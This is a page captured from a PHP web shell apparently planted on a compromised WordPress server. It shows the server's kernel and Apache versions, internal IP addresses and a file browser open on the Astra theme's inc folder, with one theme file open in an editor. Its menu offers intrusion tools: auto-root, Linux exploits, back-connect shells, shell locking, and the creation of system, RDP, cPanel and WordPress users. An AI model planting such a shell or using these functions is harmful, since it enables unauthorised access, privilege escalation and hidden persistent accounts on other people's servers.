Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cilab /
wp-content /
themes /
astra /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
addons
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-xr-x
builder
[ DIR ]
drwxr-xr-x
compatibility
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
dynamic-css
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
metabox
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
theme-update
[ DIR ]
drwxr-xr-x
admin-functions.php
1.71
KB
-rw-r--r--
class-astra-after-setup-theme....
9.63
KB
-rw-r--r--
class-astra-dynamic-css.php
297.26
KB
-rw-r--r--
class-astra-extended-base-dyna...
6.43
KB
-rw-r--r--
class-astra-global-palette.php
8.53
KB
-rw-r--r--
class-astra-loop.php
7.33
KB
-rw-r--r--
class-astra-mobile-header.php
6.06
KB
-rw-r--r--
extras.php
42.42
KB
-rw-r--r--
google-fonts.php
225.87
KB
-rw-r--r--
index.php
120
B
-rw-r--r--
markup-extras.php
71.72
KB
-rw-r--r--
template-parts.php
9.9
KB
-rw-r--r--
template-tags.php
1.15
KB
-rw-r--r--
widgets.php
4.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-functions.php
<?php /** * Admin functions - Functions that add some functionality to WordPress admin panel * * @package Astra * @since 1.0.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * Register menus */ if ( ! function_exists( 'astra_register_menu_locations' ) ) { /** * Register menus * * @since 1.0.0 */ function astra_register_menu_locations() { /** * Primary Menus */ register_nav_menus( array( 'primary' => esc_html__( 'Primary Menu', 'astra' ), ) ); if ( true === Astra_Builder_Helper::$is_header_footer_builder_active ) { /** * Register the Secondary & Mobile menus. */ register_nav_menus( array( 'secondary_menu' => esc_html__( 'Secondary Menu', 'astra' ), 'mobile_menu' => esc_html__( 'Off-Canvas Menu', 'astra' ), ) ); $component_limit = defined( 'ASTRA_EXT_VER' ) ? Astra_Builder_Helper::$component_limit : Astra_Builder_Helper::$num_of_header_menu; for ( $index = 3; $index <= $component_limit; $index++ ) { if ( ! is_customize_preview() && ! Astra_Builder_Helper::is_component_loaded( 'menu-' . $index ) ) { continue; } register_nav_menus( array( 'menu_' . $index => esc_html__( 'Menu ', 'astra' ) . $index, ) ); } /** * Register the Account menus. */ register_nav_menus( array( 'loggedin_account_menu' => esc_html__( 'Logged In Account Menu', 'astra' ), ) ); } /** * Footer Menus */ register_nav_menus( array( 'footer_menu' => esc_html__( 'Footer Menu', 'astra' ), ) ); } } add_action( 'init', 'astra_register_menu_locations' );
Close